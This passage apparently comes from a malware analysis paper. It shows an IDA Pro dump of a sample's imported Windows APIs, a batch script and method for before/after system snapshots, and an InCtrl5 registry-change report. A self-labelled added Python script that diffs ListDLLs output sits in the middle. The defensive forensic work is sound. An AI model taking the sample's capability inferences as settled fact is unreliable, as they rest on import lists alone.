.text:0041F940 00000009 C lstrcpyW
.text:0041F94C 00000009 C lstrcpyA
.text:0041F958 00000008 C lstrcpy
.text:0041F960 0000000A C lstrcmpiW
.text:0041F96C 0000000A C lstrcmpiA
.text:0041F978 00000009 C lstrcmpi
.text:0041F984 00000009 C lstrcmpW
.text:0041F990 00000009 C lstrcmpA
.text:0041F99C 00000008 C lstrcmp
.text:0041F9A4 00000009 C lstrcatW
.text:0041F9B0 00000009 C lstrcatA
.text:0041F9BC 00000008 C lstrcat
.text:0041F9C4 0000000E C WriteTapemark
.text:0041F9D4 00000014 C WriteProfileStringW
.text:0041F9E8 00000014 C WriteProfileStringA
.text:0041F9FC 00000015 C WriteProfileSectionW
.text:0041FA14 00000015 C WriteProfileSectionA
.text:0041FA2C 00000013 C WriteProcessMemory
.text:0041FA40 0000001B C WritePrivateProfileStructW
.text:0041FA5C 0000001B C WritePrivateProfileStructA
.text:0041FA78 0000001B C WritePrivateProfileStringW
.text:0041FA94 0000001B C WritePrivateProfileStringA
.text:0041FAB0 0000001C C WritePrivateProfileSectionW
.text:0041FACC 0000001C C WritePrivateProfileSectionA
.text:0041FAE8 00000010 C WriteFileGather
.text:0041FAF8 0000000C C WriteFileEx
.text:0041FB04 0000000A C WriteFile
.text:0041FB10 0000000E C WriteConsoleW
.text:0041FB20 00000014 C WriteConsoleOutputW
.text:0041FB34 0000001D C WriteConsoleOutputCharacterW
.text:0041A5F4 00000011 C WaitForInputIdle
.text:0041A608 00000013 C WINNLSGetIMEHotkey
.text:0041A61C 00000016 C WINNLSGetEnableStatus
.text:0041A634 00000010 C WINNLSEnableIME
.text:0041A644 0000000B C VkKeyScanW
.text:0041A650 0000000D C VkKeyScanExW
.text:0041A660 0000000D C VkKeyScanExA
.text:0041A670 0000000B C VkKeyScanA
.text:0041A67C 0000000C C ValidateRgn
.text:0041A688 0000000D C ValidateRect
.text:0041A698 0000000D C UpdateWindow
.text:0041A6A8 00000011 C UnregisterHotKey
.text:0041A6BC 0000001D C UnregisterDeviceNotification
.text:0041A6DC 00000011 C UnregisterClassW
.text:0041A6F0 00000011 C UnregisterClassA
.text:0041A704 00000010 C UnpackDDElParam
.text:0041A714 00000015 C UnloadKeyboardLayout
.text:0041A72C 0000000A C UnionRect
.text:0041A738 00000014 C UnhookWindowsHookEx
.text:0041A74C 00000012 C UnhookWindowsHook
.text:0041A760 0000000F C UnhookWinEvent
.text:0041A770 00000011 C TranslateMessage
.text:0041A784 00000015 C TranslateMDISysAccel
.text:0041A79C 00000016 C TranslateAcceleratorW
.text:0041A7B4 00000016 C TranslateAcceleratorA
.text:0041A7CC 00000015 C TranslateAccelerator
.text:0041A7E4 00000011 C TrackPopupMenuEx
.text:0041A7F8 0000000F C TrackPopupMenu
.text:0041A808 00000010 C TrackMouseEvent
.text:0041A818 0000000C C ToUnicodeEx
.text:0041A824 0000000A C ToUnicode
.text:0041A830 0000000A C ToAsciiEx
.text:0041A83C 00000008 C ToAscii
.text:0041A844 0000000C C TileWindows
.text:0041A850 00000011 C TileChildWindows
.text:0041A864 0000000F C TabbedTextOutW
.text:0041A874 0000000F C TabbedTextOutA
.text:0041A884 00000016 C SystemParametersInfoW
.text:0041A89C 00000016 C SystemParametersInfoA
.text:0041A8B4 00000013 C SwitchToThisWindow
.text:0041A8C8 0000000E C SwitchDesktop
.text:0041A8D8 00000010 C SwapMouseButton
.text:0041A8E8 0000000D C SubtractRect
.text:0041A8F8 00000010 C ShowWindowAsync
.text:0041A908 0000000B C ShowWindow
.text:0041A914 0000000E C ShowScrollBar
.text:0041A924 00000010 C ShowOwnedPopups
.text:0041A934 0000000B C ShowCursor
.text:0041A940 0000000A C ShowCaret
.text:0041A94C 00000010 C SetWindowsHookW
.text:0041A95C 00000012 C SetWindowsHookExW
.text:0041A970 00000012 C SetWindowsHookExA
.text:0041A984 00000010 C SetWindowsHookA
.text:0041A994 0000000E C SetWindowWord
.text:0041A9A4 0000000F C SetWindowTextW
.text:0041A9B4 0000000F C SetWindowTextA
.text:0041A9C4 0000000D C SetWindowRgn
.text:0041A9D4 0000000D C SetWindowPos
.text:0041A9E4 00000013 C SetWindowPlacement
.text:0041A9F8 0000000F C SetWindowLongW
.text:0041AA08 0000000F C SetWindowLongA
.text:0041AA18 00000017 C SetWindowContextHelpId
.text:0041AA30 00000010 C SetWinEventHook
.text:0041AA40 00000016 C SetUserObjectSecurity
.text:0041AA58 0000001A C SetUserObjectInformationW
.text:0041AA74 0000001A C SetUserObjectInformationA
.text:0041AA90 00000009 C SetTimer
.text:0041AA9C 00000011 C SetThreadDesktop
.text:0041AAB0 00000010 C SetSystemCursor
.text:0041AAC0 0000000D C SetSysColors
.text:0041FB54 0000001D C WriteConsoleOutputCharacterA
.text:0041FB74 0000001C C WriteConsoleOutputAttribute
.text:0041FB90 00000014 C WriteConsoleOutputA
.text:0041FBA4 00000013 C WriteConsoleInputW
.text:0041FBB8 00000013 C WriteConsoleInputA
.text:0041FBCC 0000000E C WriteConsoleA
.text:0041FBDC 00000008 C WinExec
.text:0041FBE4 00000014 C WideCharToMultiByte
.text:0041FBF8 0000000F C WaitNamedPipeW
.text:0041FC08 0000000F C WaitNamedPipeA
.text:0041FC18 00000016 C WaitForSingleObjectEx
.text:0041FC30 00000014 C WaitForSingleObject
.text:0041FC44 00000019 C WaitForMultipleObjectsEx
.text:0041FC60 00000017 C WaitForMultipleObjects
.text:0041FC78 00000012 C WaitForDebugEvent
.text:0041FC8C 0000000E C WaitCommEvent
.text:0041FC9C 0000000E C VirtualUnlock
.text:0041FCAC 0000000F C VirtualQueryEx
.text:0041FCBC 0000000D C VirtualQuery
.text:0041FCCC 00000011 C VirtualProtectEx
.text:0041FCE0 0000000F C VirtualProtect
.text:0041FCF0 0000000C C VirtualLock
.text:0041FCFC 0000000E C VirtualFreeEx
.text:0041FD0C 0000000C C VirtualFree
.text:0041FD18 0000000F C VirtualAllocEx
.text:0041FD28 0000000D C VirtualAlloc
.text:0041FD38 00000011 C VerLanguageNameW
.text:0041FD4C 00000011 C VerLanguageNameA
.text:0041FD60 00000010 C UpdateResourceW
.text:0041FD70 00000010 C UpdateResourceA
.text:0041FD80 00000010 C UnmapViewOfFile
.text:0041FD90 0000000D C UnlockFileEx
.text:0041FDA0 0000000B C UnlockFile
.text:0041FDAC 00000019 C UnhandledExceptionFilter
.text:0041FDC8 00000011 C TransmitCommChar
.text:0041FDDC 00000012 C TransactNamedPipe
.text:0041FDF0 0000001C C Toolhelp32ReadProcessMemory
.text:0041FE0C 0000000C C TlsSetValue
.text:0041FE18 0000000C C TlsGetValue
.text:0041FE24 00000008 C TlsFree
.text:0041FE2C 00000009 C TlsAlloc
.text:0041FE38 0000000D C Thread32Next
.text:0041FE48 0000000E C Thread32First
.text:0041FE58 00000010 C TerminateThread
.text:0041FE68 00000011 C TerminateProcess
.text:0041FE7C 00000020 C SystemTimeToTzSpecificLocalTime
.text:0041FE9C 00000015 C SystemTimeToFileTime
.text:0041FEB4 0000000F C SwitchToThread
.text:0041FEC4 0000000E C SwitchToFiber
.text:0041FED4 0000000E C SuspendThread
.text:0041FEE4 00000008 C SleepEx
.text:0041FEEC 00000006 C Sleep
.text:0041FEF4 0000000F C SizeofResource
.text:0041FF04 00000014 C SignalObjectAndWait
.text:0041FF18 0000000A C SetupComm
.text:0041FF24 00000011 C SetWaitableTimer
.text:0041FF38 00000010 C SetVolumeLabelW
.text:0041FF48 00000010 C SetVolumeLabelA
.text:0041FF58 0000001C C SetUnhandledExceptionFilter
.text:0041FF74 00000017 C SetTimeZoneInformation
.text:0041FF8C 00000017 C SetThreadPriorityBoost
.text:0041FFA4 00000012 C SetThreadPriority
.text:0041FFB8 00000010 C SetThreadLocale
.text:0041FFC8 00000018 C SetThreadIdealProcessor
.text:0041FFE0 00000018 C SetThreadExecutionState
.text:0041FFF8 00000011 C SetThreadContext
.text:0042000C 00000016 C SetThreadAffinityMask
.text:00420024 00000010 C SetTapePosition
.text:00420034 00000012 C SetTapeParameters
.text:00420048 00000018 C SetSystemTimeAdjustment
.text:0041AAD0 0000000F C SetShellWindow
.text:0041AAE0 0000000F C SetScrollRange
.text:0041AAF0 0000000D C SetScrollPos
.text:0041AB00 0000000E C SetScrollInfo
.text:0041AB10 0000000D C SetRectEmpty
.text:0041AB20 00000008 C SetRect
.text:0041AB28 00000009 C SetPropW
.text:0041AB34 00000009 C SetPropA
.text:0041AB40 00000018 C SetProcessWindowStation
.text:0041AB58 00000018 C SetProcessDefaultLayout
.text:0041AB70 0000000A C SetParent
.text:0041AB7C 00000010 C SetMessageQueue
.text:0041AB8C 00000014 C SetMessageExtraInfo
.text:0041ABA0 00000011 C SetMenuItemInfoW
.text:0041ABB4 00000011 C SetMenuItemInfoA
.text:0041ABC8 00000013 C SetMenuItemBitmaps
.text:0041ABDC 0000000C C SetMenuInfo
.text:0041ABE8 00000013 C SetMenuDefaultItem
.text:0041ABFC 00000015 C SetMenuContextHelpId
.text:0041AC14 00000008 C SetMenu
.text:0041AC1C 0000000F C SetLastErrorEx
.text:0041AC2C 00000011 C SetKeyboardState
.text:0041AC40 00000014 C SetForegroundWindow
.text:0041AC54 00000009 C SetFocus
.text:0041AC60 00000013 C SetDoubleClickTime
.text:0041AC74 00000010 C SetDlgItemTextW
.text:0041AC84 00000010 C SetDlgItemTextA
.text:0041AC94 0000000E C SetDlgItemInt
.text:0041ACA4 00000011 C SetDeskWallpaper
.text:0041ACB8 00000013 C SetDebugErrorLevel
.text:0041ACCC 0000000D C SetCursorPos
.text:0041ACDC 0000000A C SetCursor
.text:0041ACE8 00000013 C SetClipboardViewer
.text:0041ACFC 00000011 C SetClipboardData
.text:0041AD10 0000000D C SetClassWord
.text:0041AD20 0000000E C SetClassLongW
.text:0041AD30 0000000E C SetClassLongA
.text:0041AD40 0000000C C SetCaretPos
.text:0041AD4C 00000012 C SetCaretBlinkTime
.text:0041AD60 0000000B C SetCapture
.text:0041AD6C 00000010 C SetActiveWindow
.text:0041AD7C 00000013 C SendNotifyMessageW
.text:0041AD90 00000013 C SendNotifyMessageA
.text:0041ADA4 0000000D C SendMessageW
.text:0041ADB4 00000014 C SendMessageTimeoutW
.text:0041ADC8 00000014 C SendMessageTimeoutA
.text:0041ADDC 00000015 C SendMessageCallbackW
.text:0041ADF4 00000015 C SendMessageCallbackA
.text:0041AE0C 0000000D C SendMessageA
.text:0041AE1C 0000000A C SendInput
.text:0041AE28 00000012 C SendIMEMessageExW
.text:0041AE3C 00000012 C SendIMEMessageExA
.text:0041AE50 00000014 C SendDlgItemMessageW
.text:0041AE64 00000014 C SendDlgItemMessageA
.text:0041AE78 0000000F C ScrollWindowEx
.text:0041AE88 0000000D C ScrollWindow
.text:0041AE98 00000009 C ScrollDC
.text:0041AEA4 0000000F C ScreenToClient
.text:0041AEB4 0000000F C ReuseDDElParam
.text:0041AEC4 0000000D C ReplyMessage
.text:0041AED4 0000000C C RemovePropW
.text:0041AEE0 0000000C C RemovePropA
.text:0041AEEC 0000000B C RemoveMenu
.text:0041AEF8 0000000A C ReleaseDC
.text:0041AF04 0000000F C ReleaseCapture
.text:0041AF14 00000017 C RegisterWindowMessageW
.text:0041AF2C 00000017 C RegisterWindowMessageA
.text:0041AF44 0000000F C RegisterHotKey
.text:0041AF54 0000001C C RegisterDeviceNotificationW
.text:0041AF70 0000001C C RegisterDeviceNotificationA
.text:00420060 0000000E C SetSystemTime
.text:00420070 00000014 C SetSystemPowerState
.text:00420084 0000000D C SetStdHandle
.text:00420094 00000019 C SetProcessWorkingSetSize
.text:004200B0 0000001D C SetProcessShutdownParameters
.text:004200D0 00000018 C SetProcessPriorityBoost
.text:004200E8 00000017 C SetProcessAffinityMask
.text:00420100 00000011 C SetPriorityClass
.text:00420114 00000018 C SetNamedPipeHandleState
.text:0042012C 0000001B C SetMessageWaitingIndicator
.text:00420148 00000010 C SetMailslotInfo
.text:00420158 0000000F C SetLocaleInfoW
.text:00420168 0000000F C SetLocaleInfoA
.text:00420178 0000000D C SetLocalTime
.text:00420188 0000000D C SetLastError
.text:00420198 00000015 C SetHandleInformation
.text:004201B0 0000000F C SetHandleCount
.text:004201C0 0000000C C SetFileTime
.text:004201CC 0000000F C SetFilePointer
.text:004201DC 00000013 C SetFileAttributesW
.text:004201F0 00000013 C SetFileAttributesA
.text:00420204 00000011 C SetFileApisToOEM
.text:00420218 00000012 C SetFileApisToANSI
.text:0042022C 00000009 C SetEvent
.text:00420238 0000000D C SetErrorMode
.text:00420248 00000018 C SetEnvironmentVariableW
.text:00420260 00000018 C SetEnvironmentVariableA
.text:00420278 0000000D C SetEndOfFile
.text:00420288 00000016 C SetDefaultCommConfigW
.text:004202A0 00000016 C SetDefaultCommConfigA
.text:004202B8 00000015 C SetCurrentDirectoryW
.text:004202D0 00000015 C SetCurrentDirectoryA
.text:004202E8 00000015 C SetConsoleWindowInfo
.text:00420300 00000011 C SetConsoleTitleW
.text:00420314 00000011 C SetConsoleTitleA
.text:00420328 00000018 C SetConsoleTextAttribute
.text:00420340 0000001B C SetConsoleScreenBufferSize
.text:0042035C 00000013 C SetConsoleOutputCP
.text:00420370 0000000F C SetConsoleMode
.text:00420380 00000019 C SetConsoleCursorPosition
.text:0042039C 00000015 C SetConsoleCursorInfo
.text:004203B4 00000016 C SetConsoleCtrlHandler
.text:004203CC 0000000D C SetConsoleCP
.text:004203DC 0000001D C SetConsoleActiveScreenBuffer
.text:004203FC 00000011 C SetComputerNameW
.text:00420410 00000011 C SetComputerNameA
.text:00420424 00000010 C SetCommTimeouts
.text:00420434 0000000D C SetCommState
.text:00420444 0000000C C SetCommMask
.text:00420450 0000000E C SetCommConfig
.text:00420460 0000000D C SetCommBreak
.text:00420470 00000011 C SetCalendarInfoW
.text:00420484 00000011 C SetCalendarInfoA
.text:00420498 0000000C C SearchPathW
.text:004204A4 0000000C C SearchPathA
.text:004204B0 0000001B C ScrollConsoleScreenBufferW
.text:004204CC 0000001B C ScrollConsoleScreenBufferA
.text:004204E8 0000000E C RtlFillMemory
.text:004204F8 0000000D C ResumeThread
.text:00420508 00000010 C ResetWriteWatch
.text:00420518 0000000B C ResetEvent
.text:00420524 00000015 C RequestWakeupLatency
.text:0042053C 00000014 C RequestDeviceWakeup
.text:00420550 00000011 C RemoveDirectoryW
.text:00420564 00000011 C RemoveDirectoryA
.text:00420578 00000011 C ReleaseSemaphore
.text:0042058C 0000000D C ReleaseMutex
.text:0042059C 00000012 C ReadProcessMemory
.text:004205B0 00000010 C ReadFileScatter
.text:004205C0 0000000B C ReadFileEx
.text:0041AF8C 00000019 C RegisterClipboardFormatW
.text:0041AFA8 00000019 C RegisterClipboardFormatA
.text:0041AFC4 0000000F C RegisterClassW
.text:0041AFD4 00000011 C RegisterClassExW
.text:0041AFE8 00000011 C RegisterClassExA
.text:0041AFFC 0000000F C RegisterClassA
.text:0041B00C 0000000D C RedrawWindow
.text:0041B01C 00000013 C RealGetWindowClass
.text:0041B030 00000019 C RealChildWindowFromPoint
.text:0041B04C 00000009 C PtInRect
.text:0041B058 00000013 C PostThreadMessageW
.text:0041B06C 00000013 C PostThreadMessageA
.text:0041B080 00000010 C PostQuitMessage
.text:0041B090 0000000D C PostMessageW
.text:0041B0A0 0000000D C PostMessageA
.text:0041B0B0 0000000D C PeekMessageW
.text:0041B0C0 0000000D C PeekMessageA
.text:0041B0D0 0000000D C PaintDesktop
.text:0041B0E0 0000000E C PackDDElParam
.text:0041B0F0 00000013 C OpenWindowStationW
.text:0041B104 00000013 C OpenWindowStationA
.text:0041B118 00000011 C OpenInputDesktop
.text:0041B12C 00000009 C OpenIcon
.text:0041B138 0000000D C OpenDesktopW
.text:0041B148 0000000D C OpenDesktopA
.text:0041B158 0000000E C OpenClipboard
.text:0041B168 0000000B C OffsetRect
.text:0041B174 0000000B C OemToCharW
.text:0041B180 0000000F C OemToCharBuffW
.text:0041B190 0000000F C OemToCharBuffA
.text:0041B1A0 0000000B C OemToCharA
.text:0041B1AC 0000000B C OemKeyScan
.text:0041B1B8 0000000F C NotifyWinEvent
.text:0041B1C8 0000001C C MsgWaitForMultipleObjectsEx
.text:0041B1E4 0000001A C MsgWaitForMultipleObjects
.text:0041B200 0000000B C MoveWindow
.text:0041B20C 00000012 C MonitorFromWindow
.text:0041B220 00000010 C MonitorFromRect
.text:0041B230 00000011 C MonitorFromPoint
.text:0041B244 0000000C C ModifyMenuW
.text:0041B250 0000000C C ModifyMenuA
.text:0041B25C 0000000C C MessageBoxW
.text:0041B268 00000014 C MessageBoxIndirectW
.text:0041B27C 00000014 C MessageBoxIndirectA
.text:0041B290 0000000E C MessageBoxExW
.text:0041B2A0 0000000E C MessageBoxExA
.text:0041B2B0 0000000C C MessageBoxA
.text:0041B2BC 0000000C C MessageBeep
.text:0041B2C8 00000012 C MenuItemFromPoint
.text:0041B2DC 00000010 C MapWindowPoints
.text:0041B2EC 0000000F C MapVirtualKeyW
.text:0041B2FC 00000011 C MapVirtualKeyExW
.text:0041B310 00000011 C MapVirtualKeyExA
.text:0041B324 0000000F C MapVirtualKeyA
.text:0041B334 0000000E C MapDialogRect
.text:0041B344 0000001C C LookupIconIdFromDirectoryEx
.text:0041B360 0000001A C LookupIconIdFromDirectory
.text:0041B37C 00000011 C LockWindowUpdate
.text:0041B390 0000000C C LoadStringW
.text:0041B39C 0000000C C LoadStringA
.text:0041B3A8 0000000A C LoadMenuW
.text:0041B3B4 00000012 C LoadMenuIndirectW
.text:0041B3C8 00000012 C LoadMenuIndirectA
.text:0041B3DC 0000000A C LoadMenuA
.text:0041B3E8 00000014 C LoadKeyboardLayoutW
.text:0041B3FC 00000014 C LoadKeyboardLayoutA
.text:0041B410 0000000B C LoadImageW
.text:0041B41C 0000000B C LoadImageA
.text:0041B428 0000000A C LoadIconW
.text:0041B434 0000000A C LoadIconA
.text:004205CC 00000009 C ReadFile
.text:004205D8 00000016 C ReadDirectoryChangesW
.text:004205F0 0000000D C ReadConsoleW
.text:00420600 00000013 C ReadConsoleOutputW
.text:00420614 0000001C C ReadConsoleOutputCharacterW
.text:00420630 0000001C C ReadConsoleOutputCharacterA
.text:0042064C 0000001B C ReadConsoleOutputAttribute
.text:00420668 00000013 C ReadConsoleOutputA
.text:0042067C 00000012 C ReadConsoleInputW
.text:00420690 00000012 C ReadConsoleInputA
.text:004206A4 0000000D C ReadConsoleA
.text:004206B4 0000000F C RaiseException
.text:004206C4 0000000D C QueueUserAPC
.text:004206D4 0000001A C QueryPerformanceFrequency
.text:004206F0 00000018 C QueryPerformanceCounter
.text:00420708 00000010 C QueryDosDeviceW
.text:00420718 00000010 C QueryDosDeviceA
.text:00420728 0000000A C PurgeComm
.text:00420734 0000000B C PulseEvent
.text:00420740 0000000E C Process32Next
.text:00420750 0000000F C Process32First
.text:00420760 0000000C C PrepareTape
.text:0042076C 0000001B C PostQueuedCompletionStatus
.text:00420788 0000000E C PeekNamedPipe
.text:00420798 00000012 C PeekConsoleInputW
.text:004207AC 00000012 C PeekConsoleInputA
.text:004207C0 00000013 C OutputDebugStringW
.text:004207D4 00000013 C OutputDebugStringA
.text:004207E8 00000013 C OpenWaitableTimerW
.text:004207FC 00000013 C OpenWaitableTimerA
.text:00420810 0000000F C OpenSemaphoreW
.text:00420820 0000000F C OpenSemaphoreA
.text:00420830 0000000C C OpenProcess
.text:0042083C 0000000B C OpenMutexW
.text:00420848 0000000B C OpenMutexA
.text:00420854 00000011 C OpenFileMappingW
.text:00420868 00000011 C OpenFileMappingA
.text:0042087C 00000009 C OpenFile
.text:00420888 0000000B C OpenEventW
.text:00420894 0000000B C OpenEventA
.text:004208A0 00000014 C MultiByteToWideChar
.text:004208B4 00000007 C MulDiv
.text:004208BC 0000000A C MoveFileW
.text:004208C8 0000000C C MoveFileExW
.text:004208D4 0000000C C MoveFileExA
.text:004208E0 0000000A C MoveFileA
.text:004208EC 0000000D C Module32Next
.text:004208FC 0000000E C Module32First
.text:0042090C 00000010 C MapViewOfFileEx
.text:0042091C 0000000E C MapViewOfFile
.text:0042092C 0000000D C LockResource
.text:0042093C 0000000B C LockFileEx
.text:00420948 00000009 C LockFile
.text:00420954 0000000C C LocalUnlock
.text:00420960 0000000A C LocalSize
.text:0042096C 0000000C C LocalShrink
.text:00420978 0000000D C LocalReAlloc
.text:00420988 0000000A C LocalLock
.text:00420994 0000000C C LocalHandle
.text:004209A0 0000000A C LocalFree
.text:004209AC 0000000B C LocalFlags
.text:004209B8 00000018 C LocalFileTimeToFileTime
.text:004209D0 0000000D C LocalCompact
.text:004209E0 0000000B C LocalAlloc
From the "bt.exe" and "zse.exe" IDA Pro details we can conclude that the generated client
malware consists largely of input-driven functions that collect just about everything of
interest on the XP system. The generator of "bt.exe" has only a few input-driven files supporting the
configuration file, such as the encryption and file path functions. "zse.exe" holds all of the
functions and builds the collector "bt.exe" inputs from its master library of functions. When
generating "bt.exe", "zse.exe" encrypted the configuration file details within the "bt.exe"
comments, so those data variables cannot be distinguished. I highlighted the complete
section within the "bt.exe" IDA Pro output file which covers this encrypted area.
We can assume there are enough XP functions to take over the registry files and modify
anything on the system; it can do whatever the program wants to accomplish.
Other Quick Analysis
Process Explorer, Process Monitor, PsList, ListDLLs, TCPView and RootkitRevealer
(utilities from the Sysinternals Suite)⁶ were used to see what other interesting comparisons could
be found between the host before and after "bt.exe" was executed on it. InCtrl5⁷ was also used
to see what it would find. A simple batch script, "kjk_before.bat", was written to run these
tools in an orderly manner. The "before" and "after" files were then compared with a tool called
WinMerge⁸ to see the differences between the clean and the infected state.
kjk_before.bat:
pslist > pslist_before.txt
listdlls > listdlls_before.txt
procmon
procexp
Tcpview
RootkitRevealer
The Sysinternals Suite was extracted and "kjk_before.bat" was placed in the same folder.
"kjk_before.bat" was executed from within that folder, and after the batch process completed
the output files were saved into a separate folder called "before". Then the
program InCtrl5 was executed to launch "bt.exe" as part of its own "before" and "after"
process. After InCtrl5 completed, "kjk_before.bat" was executed again to capture the same
information, now for the state of the host after it had been infected. Those output
files were put into a folder called "after".
6 http://technet.microsoft.com/en-us/sysinternals/bb842062
7 http://simontodd.com/2010/02/inctrl-5-application-analysys-tool-download-and-enjoy/
8 http://winmerge.org/
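The before/after procedure above was compared by hand in WinMerge. The following Python script is an added example (not part of the paper or of the Sysinternals tools) that automates the same comparison for ListDLLs output: it parses two snapshots, reports processes and modules present only in the post-execution capture, and lists modules loaded from outside %SystemRoot%. The two snapshots are constructed for illustration in the ListDLLs layout (process header, then base/size/version/path per module); the module sets and the bt.exe PID are assumptions, not the paper's full listings.

```python
"""Before/after comparison of ListDLLs snapshots.

Added example, not from the paper: it automates the comparison the author did
by hand with WinMerge on listdlls_before.txt and listdlls_after.txt.
"""
import re

# Constructed snapshots modelled on ListDLLs output. Module sets and the
# bt.exe PID are illustrative assumptions, not the paper's full listings.
BEFORE = r"""
------------------------------------------------------------------------------
explorer.exe pid: 424
Command line: C:\WINDOWS\Explorer.EXE

  Base        Size      Version         Path
  0x01000000  0xff000   6.00.2900.5512  C:\WINDOWS\Explorer.EXE
  0x7c900000  0xb2000   5.01.2600.5512  C:\WINDOWS\system32\ntdll.dll
  0x7c800000  0xf6000   5.01.2600.5512  C:\WINDOWS\system32\kernel32.dll
"""

AFTER = r"""
------------------------------------------------------------------------------
explorer.exe pid: 424
Command line: C:\WINDOWS\Explorer.EXE

  Base        Size      Version         Path
  0x01000000  0xff000   6.00.2900.5512  C:\WINDOWS\Explorer.EXE
  0x7c900000  0xb2000   5.01.2600.5512  C:\WINDOWS\system32\ntdll.dll
  0x7c800000  0xf6000   5.01.2600.5512  C:\WINDOWS\system32\kernel32.dll
  0x3d930000  0xd1000   7.00.6000.17095 C:\WINDOWS\system32\wininet.dll
  0x77a80000  0x95000   5.131.2600.5512 C:\WINDOWS\system32\crypt32.dll
------------------------------------------------------------------------------
bt.exe pid: 2100
Command line: C:\Documents and Settings\Kevin\Desktop\bt.exe

  Base        Size      Version         Path
  0x00400000  0x2a000   0.00.0000.0000  C:\Documents and Settings\Kevin\Desktop\bt.exe
  0x7c900000  0xb2000   5.01.2600.5512  C:\WINDOWS\system32\ntdll.dll
"""

# "name pid: N" process header and "  base size version path" module lines
PROCESS_RE = re.compile(r"^(\S+)\s+pid:\s+(\d+)\s*$")
MODULE_RE = re.compile(r"^\s+(0x[0-9a-fA-F]+)\s+(0x[0-9a-fA-F]+)\s+(\S+)\s+(.+?)\s*$")


def parse_listdlls(text):
    """Return {(process, pid): {lowercased module path: (base, size, version)}}."""
    snapshot = {}
    current = None
    for line in text.splitlines():
        m = PROCESS_RE.match(line)
        if m:
            current = (m.group(1), int(m.group(2)))
            snapshot[current] = {}
            continue
        m = MODULE_RE.match(line)
        if m and current is not None:
            base, size, version, path = m.groups()
            snapshot[current][path.lower()] = (base, size, version)
    return snapshot


def diff_snapshots(before_text, after_text):
    """Report processes that appeared/disappeared and per-process module changes."""
    before = parse_listdlls(before_text)
    after = parse_listdlls(after_text)
    report = {"new_processes": [], "gone_processes": [],
              "new_modules": {}, "gone_modules": {}}
    for proc in sorted(set(before) | set(after)):
        if proc not in before:
            report["new_processes"].append(proc)
        elif proc not in after:
            report["gone_processes"].append(proc)
        else:
            added = sorted(set(after[proc]) - set(before[proc]))
            removed = sorted(set(before[proc]) - set(after[proc]))
            if added:
                report["new_modules"][proc] = added
            if removed:
                report["gone_modules"][proc] = removed
    return report


def modules_outside_systemroot(text, systemroot=r"c:\windows"):
    """List (process, path) for modules not loaded from under %SystemRoot%."""
    prefix = systemroot.lower().rstrip("\\") + "\\"
    hits = []
    for proc, modules in parse_listdlls(text).items():
        for path in sorted(modules):
            if not path.startswith(prefix):
                hits.append((proc, path))
    return hits


if __name__ == "__main__":
    report = diff_snapshots(BEFORE, AFTER)
    for proc in report["new_processes"]:
        print("new process:", proc)
    for proc, mods in report["new_modules"].items():
        print("new modules in", proc, ":", ", ".join(mods))
    for proc, path in modules_outside_systemroot(AFTER):
        print("module outside SystemRoot:", proc, path)
```

Run it against real listdlls_before.txt and listdlls_after.txt by reading the files into the two text arguments; the same regexes apply to the full ListDLLs format.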
The next few tables represent the results of what was discovered.
InCtrl5:
Installation Report: bt
Generated by InCtrl5, version 1.0.0.0
Install program: C:\Documents and Settings\Kevin\Desktop\bt.exe
4/24/2011 8:02 PM
------------------------------------------------------------
Registry
********
Keys ignored: 0
---------------
* (none)
Keys added: 2
-------------
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\HTTP\Parameters\à
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\HTTP\Parameters\à
Keys deleted: 2
---------------
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\HTTP\Parameters\t
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\HTTP\Parameters\t
Values added: 1
---------------
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "C:\Documents and
Settings\Kevin\Desktop\bt.exe"
Type: REG_SZ
Data: bt
Values changed: 19
------------------
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "AppData"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Application Data
New data: C:\WINDOWS\system32\config\systemprofile\Application Data
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cache"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files
New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cookies"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\LocalService\Cookies
New data: C:\WINDOWS\system32\config\systemprofile\Cookies
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "History"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Local Settings\History
New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\History
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
"SavedLegacySettings"
Old type: REG_BINARY
New type: REG_BINARY
Old data: 46, 00, 00, 00, 0C, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00,
00, 00, 00, 00, 00, 60, CA, 45, 95, FD, E8, CB, 01, 03, 00, 00, 00, A9, FE, FB, AA, A9, FE, 73, 47, 0A, 00, 01, 10, 00, 00, 00, 00,
00, 00, 00, 00, 00, 00, 00, 00
New data: 46, 00, 00, 00, 0D, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00,
00, 00, 00, 00, 00, 60, CA, 45, 95, FD, E8, CB, 01, 03, 00, 00, 00, A9, FE, FB, AA, A9, FE, 73, 47, 0A, 00, 01, 10, 00, 00, 00, 00,
00, 00, 00, 00, 00, 00, 00, 00
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "AppData"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Application Data
New data: C:\WINDOWS\system32\config\systemprofile\Application Data
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cache"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files
New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files
